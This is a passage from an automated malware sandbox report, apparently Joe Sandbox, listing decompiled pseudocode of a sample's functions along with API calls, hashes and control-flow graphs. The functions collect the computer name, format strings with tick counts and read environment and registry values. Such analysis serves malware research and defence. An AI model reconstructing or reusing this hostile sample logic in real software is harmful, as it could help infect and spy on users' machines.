                                          					goto L30;
                                          				} else {
                                          					_t54 = _t22;
                                          					L34:
                                          					return _t54;
                                          				}
                                          			}

                                          APIs
                                            • Part of subcall function 043511AF: GetModuleHandleA.KERNEL32(4C44544E,00000000,04354920,00000001), ref: 043511BE
                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 0435499D
                                            • Part of subcall function 043558BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04351C51), ref: 043558CA
                                          • memset.NTDLL ref: 043549ED
                                          • RtlInitializeCriticalSection.NTDLL(06879570), ref: 043549FE
                                            • Part of subcall function 04356CD3: memset.NTDLL ref: 04356CED
                                            • Part of subcall function 04356CD3: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04356D24
                                            • Part of subcall function 04356CD3: StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04354AB5), ref: 04356D2F
                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04354A29
                                          • wsprintfA.USER32 ref: 04354A59
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                          • String ID:
                                          • API String ID: 4246211962-0
                                          • Opcode ID: 5f2c5d7fe93f9831d2b32287e40649d932e55521c18aa99ee7dbda1fead1e5fd
                                          • Instruction ID: 3f8b14ec382748beb13239727c578591994b61720538faac6b748f10260cad95
                                          • Opcode Fuzzy Hash: 5f2c5d7fe93f9831d2b32287e40649d932e55521c18aa99ee7dbda1fead1e5fd
                                          • Instruction Fuzzy Hash: 8F51D471A00315AFEB65EBA4D845F6E73ACEF18724F04B415ED01D71A0E778FA808B94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 90%
                                          			E04356CD3(void* __eflags, WCHAR* _a4) {
                                          				char _v40;
                                          				char _v44;
                                          				void _v48;
                                          				int _v52;
                                          				char _v56;
                                          				char _v60;
                                          				void* _v64;
                                          				char _v68;
                                          				intOrPtr _v72;
                                          				int _v76;
                                          				WCHAR* _v84;
                                          				intOrPtr _v88;
                                          				intOrPtr _v92;
                                          				char _v96;
                                          				void* __ebx;
                                          				void* __esi;
                                          				intOrPtr _t40;
                                          				int _t45;
                                          				char _t50;
                                          				intOrPtr _t52;
                                          				void* _t55;
                                          				intOrPtr _t67;
                                          				void* _t70;
                                          				void* _t81;
                                          				WCHAR* _t90;
                                          
                                          				_v52 = 0;
                                          				memset( &_v48, 0, 0x2c);
                                          				_v76 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t40 =  *0x435d2a4; // 0x251a5a8
                                          				_t5 = _t40 + 0x435ee24; // 0x410025
                                          				_t90 = E04354814(_t5);
                                          				_v84 = _t90;
                                          				if(_t90 == 0) {
                                          					_t81 = 8;
                                          					L24:
                                          					return _t81;
                                          				}
                                          				_t45 = StrCmpNIW(_t90, _a4, lstrlenW(_t90)); // executed
                                          				if(_t45 != 0) {
                                          					_t81 = 1;
                                          					L22:
                                          					E0435147E(_v88);
                                          					goto L24;
                                          				}
                                          				if(E04359138(0,  &_v96) != 0) {
                                          					_v96 = 0;
                                          				}
                                          				_t50 = E0435A5E9(0,  *0x435d33c);
                                          				_v96 = _t50;
                                          				if(_t50 == 0) {
                                          					_t81 = 8;
                                          					goto L19;
                                          				} else {
                                          					_t52 =  *0x435d2a4; // 0x251a5a8
                                          					_t11 = _t52 + 0x435e81a; // 0x65696c43
                                          					_t55 = E0435A5E9(0, _t11);
                                          					_t93 = _t55;
                                          					if(_t55 == 0) {
                                          						_t81 = 8;
                                          					} else {
                                          						_t81 = E043574B9(_v96, 0x80000001, _v92, _t93,  &_v60,  &_v56);
                                          						E0435147E(_t93);
                                          					}
                                          					if(_t81 != 0) {
                                          						L17:
                                          						E0435147E(_v92);
                                          						L19:
                                          						_t92 = _v96;
                                          						if(_v96 != 0) {
                                          							E0435568A(_t92);
                                          						}
                                          						goto L22;
                                          					} else {
                                          						if(( *0x435d260 & 0x00000001) == 0) {
                                          							L14:
                                          							E04356E92(_t81, _v60, _v56,  *0x435d270, 0);
                                          							_t81 = E04356737(_v72,  &_v64,  &_v60, 0);
                                          							if(_t81 == 0) {
                                          								_v68 = _v96;
                                          								_v64 =  &_v60;
                                          								_t81 = E043572F2( &_v84, 0);
                                          							}
                                          							E0435147E(_v60);
                                          							goto L17;
                                          						}
                                          						_t67 =  *0x435d2a4; // 0x251a5a8
                                          						_t18 = _t67 + 0x435e823; // 0x65696c43
                                          						_t70 = E0435A5E9(0, _t18);
                                          						_t95 = _t70;
                                          						if(_t70 == 0) {
                                          							_t81 = 8;
                                          						} else {
                                          							_t22 =  &_v96; // 0x65696c43
                                          							_t81 = E043574B9( *_t22, 0x80000001, _v92, _t95,  &_v44,  &_v40);
                                          							E0435147E(_t95);
                                          						}
                                          						if(_t81 != 0) {
                                          							goto L17;
                                          						} else {
                                          							goto L14;
                                          						}
                                          					}
                                          				}
                                          			}

                                          APIs
                                          • memset.NTDLL ref: 04356CED
                                            • Part of subcall function 04354814: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,04356D15,00410025,00000005,?,00000000), ref: 04354825
                                            • Part of subcall function 04354814: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 04354842
                                          • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04356D24
                                          • StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04354AB5), ref: 04356D2F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: EnvironmentExpandStrings$lstrlenmemset
                                          • String ID: Clie
                                          • API String ID: 3817122888-1624203186
                                          • Opcode ID: c31a412ddcd7b2224e4baf415773df64e24a08bd9dfd8d74a1d2c57b6f8faa53
                                          • Instruction ID: 1e9900a7805dd0c9d752b427d9f4461d04c08b224653802c8fc31d7da82c7ac9
                                          • Opcode Fuzzy Hash: c31a412ddcd7b2224e4baf415773df64e24a08bd9dfd8d74a1d2c57b6f8faa53
                                          • Instruction Fuzzy Hash: A041C272605341AFEB10AFA0DC85D6FB7ECEF48704F40A929BD88D7120D670ED048B92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 366 4354ffa-435503c 368 43550c3-43550c9 366->368 369 4355042-435504b 366->369 370 435504d-435505e SysAllocString 369->370 371 435508c-435508f 369->371 374 4355060-4355067 370->374 375 4355069-4355081 370->375 372 4355091-43550a1 SysAllocString 371->372 373 43550ed 371->373 377 43550a3 372->377 378 43550cc-43550eb 372->378 379 43550ef-43550f2 373->379 376 43550b5-43550b8 374->376 382 4355085-435508a 375->382 376->368 383 43550ba-43550bd SysFreeString 376->383 381 43550aa-43550ac 377->381 378->379 380 43550f4-4355101 379->380 379->381 380->368 381->376 384 43550ae-43550af SysFreeString 381->384 382->371 382->376 383->368 384->376
                                          APIs
                                          • SysAllocString.OLEAUT32(80000002), ref: 04355057
                                          • SysAllocString.OLEAUT32(0435A6F4), ref: 0435509B
                                          • SysFreeString.OLEAUT32(00000000), ref: 043550AF
                                          • SysFreeString.OLEAUT32(00000000), ref: 043550BD
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: a086fd3e96ba5ab3e7140c444b9b555fe185282249c870d935f8a03027cab48b
                                          • Instruction ID: 46db0a0be9de86f7b879f809c6a8883ca9bc842f3e49f0cfce4976bad2858160
                                          • Opcode Fuzzy Hash: a086fd3e96ba5ab3e7140c444b9b555fe185282249c870d935f8a03027cab48b
                                          • Instruction Fuzzy Hash: 7431EB72900209FFCB05DF98D494CAE7BB9FF48310B10946AE9069B250E775AA81CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 386 4351295-43512a9 387 43512ae-43512b3 386->387 388 43512b9-43512bc 387->388 389 435134a-4351351 387->389 390 43512d6-43512d9 388->390 391 43512be-43512d3 Sleep 388->391 390->389 392 43512db-43512e0 390->392 391->390 394 43512e2-43512f4 392->394 395 435133d-4351348 392->395 397 4351334-4351339 394->397 398 43512f6-4351303 lstrlenW 394->398 395->389 397->395 398->397 399 4351305-4351313 call 43558be 398->399 402 4351315-4351322 memcpy 399->402 403 4351324 399->403 404 435132b-435132e SysFreeString 402->404 403->404 404->397
                                          C-Code - Quality: 78%
                                          			E04351295(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                          				intOrPtr _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				intOrPtr _t26;
                                          				intOrPtr* _t28;
                                          				intOrPtr _t31;
                                          				intOrPtr* _t32;
                                          				void* _t39;
                                          				int _t46;
                                          				intOrPtr* _t47;
                                          				int _t48;
                                          
                                          				_t47 = __eax;
                                          				_push( &_v12);
                                          				_push(__eax);
                                          				_t39 = 0;
                                          				_t46 = 0; // executed
                                          				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                          				_v8 = _t26;
                                          				if(_t26 < 0) {
                                          					L13:
                                          					return _v8;
                                          				}
                                          				if(_v12 == 0) {
                                          					Sleep(0xc8);
                                          					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                          				}
                                          				if(_v8 >= _t39) {
                                          					_t28 = _v12;
                                          					if(_t28 != 0) {
                                          						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                          						_v8 = _t31;
                                          						if(_t31 >= 0) {
                                          							_t46 = lstrlenW(_v16);
                                          							if(_t46 != 0) {
                                          								_t46 = _t46 + 1;
                                          								_t48 = _t46 + _t46;
                                          								_t39 = E043558BE(_t48);
                                          								if(_t39 == 0) {
                                          									_v8 = 0x8007000e;
                                          								} else {
                                          									memcpy(_t39, _v16, _t48);
                                          								}
                                          								__imp__#6(_v16);
                                          							}
                                          						}
                                          						_t32 = _v12;
                                          						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                          					}
                                          					 *_a4 = _t39;
                                          					 *_a8 = _t46 + _t46;
                                          				}
                                          				goto L13;
                                          			}

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeSleepStringlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1198164300-0
                                          • Opcode ID: 973428e5009ca8a7b361efd2b1203985eefa8ae555a4d0a4d57b7f44a3b5d02a
                                          • Instruction ID: 7e70a5d38e872fb70c011dded8428242b6558e9b971c7540a2f04e65e8329e92
                                          • Opcode Fuzzy Hash: 973428e5009ca8a7b361efd2b1203985eefa8ae555a4d0a4d57b7f44a3b5d02a
                                          • Instruction Fuzzy Hash: 39213C75D0120AEFDB11DFA4D898E9EBBB8FF48304B105169E945E7210EB70EA41CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 405 43568cf-43568e9 call 4359138 408 43568ee-4356907 call 4351b13 405->408 409 43568eb 405->409 411 435690c-4356910 408->411 409->408 412 4356916-4356930 StrToIntExW 411->412 413 43569cf-43569d4 411->413 416 4356936-4356952 call 4355fcb 412->416 417 43569bf-43569c1 412->417 414 43569d6 call 435568a 413->414 415 43569db-43569e1 413->415 414->415 418 43569c2-43569cd HeapFree 416->418 422 4356954-435696d call 43575e7 416->422 417->418 418->413 425 435698f-43569bd call 4351bc1 HeapFree 422->425 426 435696f-4356976 422->426 425->418 426->425 428 4356978-435698a call 43575e7 426->428 428->425
                                          C-Code - Quality: 100%
                                          			E043568CF() {
                                          				void* _v8;
                                          				int _v12;
                                          				WCHAR* _v16;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t23;
                                          				intOrPtr _t24;
                                          				void* _t26;
                                          				intOrPtr _t32;
                                          				intOrPtr _t35;
                                          				intOrPtr _t38;
                                          				intOrPtr _t42;
                                          				void* _t45;
                                          				void* _t51;
                                          
                                          				_v12 = 0;
                                          				_t23 = E04359138(0,  &_v8); // executed
                                          				if(_t23 != 0) {
                                          					_v8 = 0;
                                          				}
                                          				_t24 =  *0x435d2a4; // 0x251a5a8
                                          				_t4 = _t24 + 0x435ede0; // 0x6879388
                                          				_t5 = _t24 + 0x435ed88; // 0x4f0053
                                          				_t26 = E04351B13( &_v16, _v8, _t5, _t4); // executed
                                          				_t45 = _t26;
                                          				if(_t45 == 0) {
                                          					StrToIntExW(_v16, 0,  &_v12);
                                          					_t45 = 8;
                                          					if(_v12 < _t45) {
                                          						_t45 = 1;
                                          						__eflags = 1;
                                          					} else {
                                          						_t32 =  *0x435d2a4; // 0x251a5a8
                                          						_t11 = _t32 + 0x435edd4; // 0x687937c
                                          						_t48 = _t11;
                                          						_t12 = _t32 + 0x435ed88; // 0x4f0053
                                          						_t51 = E04355FCB(_t11, _t12, _t11);
                                          						_t58 = _t51;
                                          						if(_t51 != 0) {
                                          							_t35 =  *0x435d2a4; // 0x251a5a8
                                          							_t13 = _t35 + 0x435ea59; // 0x30314549
                                          							if(E043575E7(_t48, _t58, _v8, _t51, _t13, 0x14) == 0) {
                                          								_t60 =  *0x435d25c - 6;
                                          								if( *0x435d25c <= 6) {
                                          									_t42 =  *0x435d2a4; // 0x251a5a8
                                          									_t15 = _t42 + 0x435ec3a; // 0x52384549
                                          									E043575E7(_t48, _t60, _v8, _t51, _t15, 0x13);
                                          								}
                                          							}
                                          							_t38 =  *0x435d2a4; // 0x251a5a8
                                          							_t17 = _t38 + 0x435ee18; // 0x68793c0
                                          							_t18 = _t38 + 0x435edf0; // 0x680043
                                          							_t45 = E04351BC1(_v8, 0x80000001, _t51, _t18, _t17);
                                          							HeapFree( *0x435d238, 0, _t51);
                                          						}
                                          					}
                                          					HeapFree( *0x435d238, 0, _v16);
                                          				}
                                          				_t53 = _v8;
                                          				if(_v8 != 0) {
                                          					E0435568A(_t53);
                                          				}
                                          				return _t45;
                                          			}

                                          APIs
                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,06879388,00000000,?,7519F710,00000000,7519F730), ref: 0435691E
                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,068793C0,?,00000000,30314549,00000014,004F0053,0687937C), ref: 043569BB
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04359C10), ref: 043569CD
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 8d16adf3eaa76e0c23d554a4e851eb6124b8fdd84f5214a8a3c2a896d84bdf89
                                          • Instruction ID: 38351b2767321f8d0483e96e294795358095d3ea9cf5834df277f7bdf9f6c6ce
                                          • Opcode Fuzzy Hash: 8d16adf3eaa76e0c23d554a4e851eb6124b8fdd84f5214a8a3c2a896d84bdf89
                                          • Instruction Fuzzy Hash: CC319332A00259BFEB11EBA0DC85EAE7BBDEF08704F056065F908AB160D770EE14DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E04359F11(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                          				void* _v8;
                                          				void* __edi;
                                          				intOrPtr _t19;
                                          				void* _t25;
                                          				void* _t31;
                                          				void* _t37;
                                          				void* _t41;
                                          				intOrPtr _t43;
                                          				void* _t44;
                                          
                                          				_t37 = __edx;
                                          				_t33 = __ecx;
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t43 =  *0x435d2a4; // 0x251a5a8
                                          				_push(0x800);
                                          				_push(0);
                                          				_push( *0x435d238);
                                          				_t1 = _t43 + 0x435e791; // 0x6976612e
                                          				_t44 = _t1;
                                          				if( *0x435d24c >= 5) {
                                          					if(RtlAllocateHeap() == 0) {
                                          						L6:
                                          						_t31 = 8;
                                          						L7:
                                          						if(_t31 != 0) {
                                          							L10:
                                          							 *0x435d24c =  *0x435d24c + 1;
                                          							L11:
                                          							return _t31;
                                          						}
                                          						_t46 = _a4;
                                          						_t41 = _v8;
                                          						 *_a16 = _a4;
                                          						 *_a20 = E04357CF7(_a4, _t41); // executed
                                          						_t19 = E043560CF(_t41, _t41, _t46); // executed
                                          						if(_t19 != 0) {
                                          							 *_a8 = _t41;
                                          							 *_a12 = _t19;
                                          							if( *0x435d24c < 5) {
                                          								 *0x435d24c =  *0x435d24c & 0x00000000;
                                          							}
                                          							goto L11;
                                          						}
                                          						_t31 = 0xbf;
                                          						E04356106();
                                          						RtlFreeHeap( *0x435d238, 0, _t41); // executed
                                          						goto L10;
                                          					}
                                          					_t25 = E0435514F(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t14);
                                          					L5:
                                          					_t31 = _t25;
                                          					goto L7;
                                          				}
                                          				if(RtlAllocateHeap() == 0) {
                                          					goto L6;
                                          				}
                                          				_t25 = E04351754(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t26); // executed
                                          				goto L5;
                                          			}

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 04359F3B
                                            • Part of subcall function 04351754: GetTickCount.KERNEL32 ref: 04351768
                                            • Part of subcall function 04351754: wsprintfA.USER32 ref: 043517B8
                                            • Part of subcall function 04351754: wsprintfA.USER32 ref: 043517D5
                                            • Part of subcall function 04351754: wsprintfA.USER32 ref: 04351801
                                            • Part of subcall function 04351754: HeapFree.KERNEL32(00000000,?), ref: 04351813
                                            • Part of subcall function 04351754: wsprintfA.USER32 ref: 04351834
                                            • Part of subcall function 04351754: HeapFree.KERNEL32(00000000,?), ref: 04351844
                                            • Part of subcall function 04351754: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04351872
                                            • Part of subcall function 04351754: GetTickCount.KERNEL32 ref: 04351883
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 04359F59
                                          • RtlFreeHeap.NTDLL(00000000,?,?,?,04359C62,00000002,?,?,?,?), ref: 04359FB6
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                          • String ID:
                                          • API String ID: 1676223858-0
                                          • Opcode ID: 9e9a57448d69fe402c2a5d1a469c5226809962cd56cd8b9c71ba6beca1e70d3f
                                          • Instruction ID: f321c05bc4ae43f514839c3c611d72a72b12f84cc2729fbabb813a25c094a61f
                                          • Opcode Fuzzy Hash: 9e9a57448d69fe402c2a5d1a469c5226809962cd56cd8b9c71ba6beca1e70d3f
                                          • Instruction Fuzzy Hash: FE2119B5200305EBEB119F69E840FAA77ACEF48349F10A025FD0697260D774FD459BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E0435642C(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                          				void* _v8;
                                          				void* __esi;
                                          				intOrPtr* _t35;
                                          				void* _t40;
                                          				intOrPtr* _t41;
                                          				intOrPtr* _t43;
                                          				intOrPtr* _t45;
                                          				intOrPtr* _t50;
                                          				intOrPtr* _t52;
                                          				void* _t54;
                                          				intOrPtr* _t55;
                                          				intOrPtr* _t57;
                                          				intOrPtr* _t61;
                                          				intOrPtr* _t65;
                                          				intOrPtr _t68;
                                          				void* _t72;
                                          				void* _t75;
                                          				void* _t76;
                                          
                                          				_t55 = _a4;
                                          				_t35 =  *((intOrPtr*)(_t55 + 4));
                                          				_a4 = 0;
                                          				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                          				if(_t76 < 0) {
                                          					L18:
                                          					return _t76;
                                          				}
                                          				_t40 = E04354FFA(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                          				_t76 = _t40;
                                          				if(_t76 >= 0) {
                                          					_t61 = _a28;
                                          					if(_t61 != 0 &&  *_t61 != 0) {
                                          						_t52 = _v8;
                                          						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                          					}
                                          					if(_t76 >= 0) {
                                          						_t43 =  *_t55;
                                          						_t68 =  *0x435d2a4; // 0x251a5a8
                                          						_t20 = _t68 + 0x435e1fc; // 0x740053
                                          						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                          						if(_t76 >= 0) {
                                          							_t76 = E04355103(_a4);
                                          							if(_t76 >= 0) {
                                          								_t65 = _a28;
                                          								if(_t65 != 0 &&  *_t65 == 0) {
                                          									_t50 = _a4;
                                          									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                          								}
                                          							}
                                          						}
                                          						_t45 = _a4;
                                          						if(_t45 != 0) {
                                          							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                          						}
                                          						_t57 = __imp__#6;
                                          						if(_a20 != 0) {
                                          							 *_t57(_a20);
                                          						}
                                          						if(_a12 != 0) {
                                          							 *_t57(_a12);
                                          						}
                                          					}
                                          				}
                                          				_t41 = _v8;
                                          				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                          				goto L18;
                                          			}






















                                          APIs
                                            • Part of subcall function 04354FFA: SysAllocString.OLEAUT32(80000002), ref: 04355057
                                            • Part of subcall function 04354FFA: SysFreeString.OLEAUT32(00000000), ref: 043550BD
                                          • SysFreeString.OLEAUT32(?), ref: 0435650B
                                          • SysFreeString.OLEAUT32(0435A6F4), ref: 04356515
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloc
                                          • String ID:
                                          • API String ID: 986138563-0
                                          • Opcode ID: aeb43272750f494d4b3c506cd8d56d3dafa64b7606206985e6e671220310b841
                                          • Instruction ID: 043108584d32dda2d3d5d77112a009316f7560d0a3865c8e39a1f2f148c42aca
                                          • Opcode Fuzzy Hash: aeb43272750f494d4b3c506cd8d56d3dafa64b7606206985e6e671220310b841
                                          • Instruction Fuzzy Hash: 00314B72500159AFCB11DF68C889CAFBB79FFC97447644A58FC199B224E231ED51CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E043573E9(void* __ecx) {
                                          				signed int _v8;
                                          				void* _t15;
                                          				void* _t19;
                                          				void* _t20;
                                          				void* _t22;
                                          				intOrPtr* _t23;
                                          
                                          				_t23 = __imp__;
                                          				_t20 = 0;
                                          				_v8 = _v8 & 0;
                                          				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                          				_t10 = _v8;
                                          				if(_v8 != 0) {
                                          					_t20 = E043558BE(_t10 + 1);
                                          					if(_t20 != 0) {
                                          						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                          						if(_t15 != 0) {
                                          							 *((char*)(_v8 + _t20)) = 0;
                                          						} else {
                                          							E0435147E(_t20);
                                          							_t20 = 0;
                                          						}
                                          					}
                                          				}
                                          				return _t20;
                                          			}










                                          APIs
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,043551DC,7519F710,00000000,?,?,043551DC), ref: 04357401
                                            • Part of subcall function 043558BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04351C51), ref: 043558CA
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,043551DC,043551DD,?,?,043551DC), ref: 0435741E
                                            • Part of subcall function 0435147E: HeapFree.KERNEL32(00000000,00000000,04351D11,00000000,?,?,-00000008), ref: 0435148A
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: ComputerHeapName$AllocateFree
                                          • String ID:
                                          • API String ID: 187446995-0
                                          • Opcode ID: ab45c27c6e9bd1599d9c0c1326d0b2427f4e0d7c8a553347e33d421f67f28cb0
                                          • Instruction ID: 6b497c55efeb5231a1bfc37a3598e73d4ce6676f65922cd1ff60ee037ed13f61
                                          • Opcode Fuzzy Hash: ab45c27c6e9bd1599d9c0c1326d0b2427f4e0d7c8a553347e33d421f67f28cb0
                                          • Instruction Fuzzy Hash: AEF0B466B00249BAEB10DABA8C00EAF7ABCDFC4650F711059AD04D3110EB74EF0186B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 34%
                                          			E04357BA9(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                          				intOrPtr _v12;
                                          				void* _v18;
                                          				char _v20;
                                          				intOrPtr _t15;
                                          				void* _t17;
                                          				intOrPtr _t19;
                                          				void* _t23;
                                          
                                          				_v20 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosw");
                                          				_t15 =  *0x435d2a4; // 0x251a5a8
                                          				_t4 = _t15 + 0x435e39c; // 0x6878944
                                          				_t20 = _t4;
                                          				_t6 = _t15 + 0x435e124; // 0x650047
                                          				_t17 = E0435642C(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                          				if(_t17 < 0) {
                                          					_t23 = _t17;
                                          				} else {
                                          					_t23 = 8;
                                          					if(_v20 != _t23) {
                                          						_t23 = 1;
                                          					} else {
                                          						_t19 = E04354CD3(_t20, _v12);
                                          						if(_t19 != 0) {
                                          							 *_a16 = _t19;
